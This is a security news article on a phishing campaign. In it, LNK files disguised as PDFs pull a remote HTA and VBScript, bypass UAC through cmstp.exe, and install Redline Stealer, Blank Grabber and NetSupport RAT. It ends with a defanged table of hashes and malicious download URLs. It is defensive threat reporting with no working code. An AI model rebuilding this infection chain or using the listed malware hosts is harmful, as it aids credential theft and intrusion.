Threat actors have shifted from using malicious macros to malicious LNK files for initial access. This is due to Microsoft’s announcement in 2022 to disable macros by default for Office documents downloaded from unknown sources or the internet.
The current attack vector uses the Microsoft Connection Manager Profile, which runs the process cmstp.exe for proxying the execution of malicious payloads.
This current campaign was found to be similar to the Invicta stealer infection method, but the infection chain seems to be varying. This concludes that threat actors have changed their TTPs (Tactics, Techniques, and Procedures).
In most cases, the LNK file containing the remote VBScript infection is distributed via spam emails disguised as legitimate-looking attachments with file extensions like ZIP or ISO.
LNK Files to Exploit Microsoft Connection Manager Profile
Following the download of a ZIP file embedded with the LNK file which is disguised as a PDF file. This initiates a remote command execution of a .hta file on a remote server.
Once this .hta file gets executed, it initiates the download of the VBScript that is extremely obfuscated. This VBScript, after execution, de-obfuscates the PowerShell loader, resulting in the activation of a PowerShell downloader.
This PowerShell downloader fetches the malware files from two URLs namely,
hxxp[:]//a0840501.xsph[.]ru/Inv.pdf
hxxp[:]//a0840501.xsph[.]ru/71iqujprzsp4w[.]exe
These files are then stored in the AppDataRoaming directory along with their original names. The files are one PDF and one EXE file (Redline stealer library). The PowerShell downloader uses cmstp.exe for UAC (User Access Control) bypass.
Weaponized LNK Files Uncovered
As per the report submitted to Cyber Security News, the malware payloads, Weaponized LNK Files were discovered to be Blank Grabber, Redline Stealer, and NetSupport RAT.
Blank Grabber is a Python-based open-source stealer that contains a GUI builder and can be used to generate stealer payloads easily. It also provides the option to customize the stealer like custom icon, UAC bypass, and persistence during startup.
Redline Stealer is sold on cyberforums and is one of the most prominent infostealers in cyberspace. This can be used to gain unauthorized access to sensitive information like passwords, login credentials, autofill data, and credit card details.
NetSupport RAT is a commercial RAT used for legitimate remote access to users by administrators but is being misused by threat actors to gain unauthorized access.
Furthermore, a complete report has been published by Cyble researchers which provides detailed information about the obfuscation, attack vector, YARA rules, and other details.
Indicators of Compromise
IndicatorsIndicator TypeDescription110ea5727b750a69876de6613ba71c8f80ededd2e7cef2a276a855082affcd9fSHA256Blank Grabberhttps[:]//transfer.sh/iATCFJFn3d/Video_of%20Dollar_Recalling.exeURLMalicious URLa6c163e45059640158828422622606f0d1608bb61ed0cb3cb27a138fe1c50c6dSHA256Malicious HTA Filehxxp[:]//onlythefamily[.]ddns.net/crypt[.]exeURLMalicious URLhxxp[:]//a0820799.xsph[.]ru/Payload[.]exeURLMalicious URL27fd34dae9c30605a0739011fce957acd40c679b1b19a079946c4a6e6a0445f9MD5SHA1SHA256Redline Stealer513bc40cedbb94ee65afe77dac8464bb2693a098a15a08bb68a761acec223cddSHA256Redline Stealer3225120683b1449548f441eb5649bf6efc38af4ff74975ecb203ea8766247115SHA256Malicious Lnk Filebbbebe67be31bcc286fe08f24ade73cb162f7f501c974151e66fc375c2f22563SHA256Malicious Lnk File9905c430c3aa6e909c773af010ef8045521aba759d20a036ce065d8bf88eb9eeSHA256Malicious HTA File49a568f8ac11173e3a0d76cff6bc1d4b9bdf2c35c6d8570177422f142dcfdbe3SHA256NetSupportManagerhxxps://montec-shop[.]de/images/client32[.]exeURLMalicious URLhxxp[:]//94.156.253[.]17/Downloads/careabout[.]htaURLMalicious URL6f08017be2fb3359cc15e2325e934465a9e7257657809f712c85f51a568e9dfcSHA256Malicious Lnk File0786f1889d5f3f73b5d25289b2d9d8f6a578758bc6987f88d8ae7c81c2baacd9SHA256Malicious Lnk Filee9abe79fceded092601af33d75859030242fd1e9ad4978cd1ceba5d9e9d88d7eSHA256Malicious Lnk Filede3d0a11dec2e3b4afce991a690024e96dca389f8a0a3c6a65b559c9f1c12d59SHA256Malicious Lnk Filef9446736df6a16ba5747b617d8f69a327ec150a07f7e0adb944b65e23c2fcdc9SHA256Malicious Lnk File8f65f6a346f568171760ce5b747bd6177a2e0111d37a3df5047905c4f1f86346SHA256Malicious Lnk File687baa62d88a16ae54e4ff3ad584a5c7bdf71121a0fc84d863363f064cd6053bSHA256Malicious Lnk File1126845e909b7c776e5b48bf64db24f19b0183b7204f50aedfb8ecba52c8dcbbSHA256Malicious Lnk Filec2807549c5965cf165839b876f8dd3ea44d51478e4cdc4dcca6146b223b0066dSHA256Malicious Lnk Filecf8decdb1efe459a0e8d5817d209cfdd27731694956db3e111f1f8cb32456a7aSHA256Malicious Lnk File837f7e7a6799e25767839e487d97a5b61d9dc43add143e4b3680d756fefc1b95SHA256Malicious Lnk File845087bb407b34d8003174a3b63b6c50c7ab4b13ef81636b8344740bb7a8559cSHA256Malicious Lnk Filea2dfcc3e26858a9c730b7c10b55f82ae4dcea1a35826cfbe992287df80c4929bSHA256Malicious Lnk File84172e09798be8252fb18887e9cd29e47279df9641ab50185a6eea50f4c02fefSHA256Malicious Lnk File59b392a0ff9a3ff064b5a4ab90de5b68c758429280c612fd08f9399475d3108dSHA256Malicious Lnk File48cffc07e026c38234b77ca74d30a07a01f16da9d8ab24be73c934d6972f0aceSHA256Malicious Lnk Filecc652a2be3f935f1bf3c40f7033239e09357da22f98b6abcab17bbb34266a02aSHA256Malicious Lnk Filebbbebe67be31bcc286fe08f24ade73cb162f7f501c974151e66fc375c2f22563SHA256Malicious Lnk Filedf86358f815e4c6760f5005a283c5e842dd7091dc328ac0f73b7667f6754c8bcSHA256Malicious Lnk File3225120683b1449548f441eb5649bf6efc38af4ff74975ecb203ea8766247115SHA256Malicious Lnk File8b6ea98bb931bf67bcea0ff67cc5d44d956a4b3fffd1817e1f3ad89696fb3798SHA256Malicious Lnk Filef602321b7a764a0dffe32d9dfbac7c221fcf200f13d20e4fbfe978d56496a72bSHA256Malicious Lnk Filed1825f07b07560f8d76c8d9125fc3029a4b328ecca836d01b5934ff8f02a32e1SHA256Malicious Lnk Filea08c36812818618f44782c3677c8b8b8159a1beacbad66adbe232e694d91176eSHA256Malicious Lnk Filee9cbfe72cf4bf807f57df16611bea622c77ad501ee85c39ed171b8cdb05ba092SHA256Malicious Lnk File3a00180db6da59cc44933db6faa043b1ae770098a4eb52d5c2f4cf060cb60d72SHA256Malicious Lnk File7fd01399dec681c37cd14edeb37c601a85e1a3e567d0ff2accca1dad4bc9c53bSHA256Malicious Lnk File
Keep informed about the latest Cyber Security News by following us on Google News, Linkedin, Twitter, and Facebook.
The post Hackers Use Weaponized LNK Files to Exploit Microsoft Connection Manager Profile appeared first on Cyber Security News.
Cyber Security News
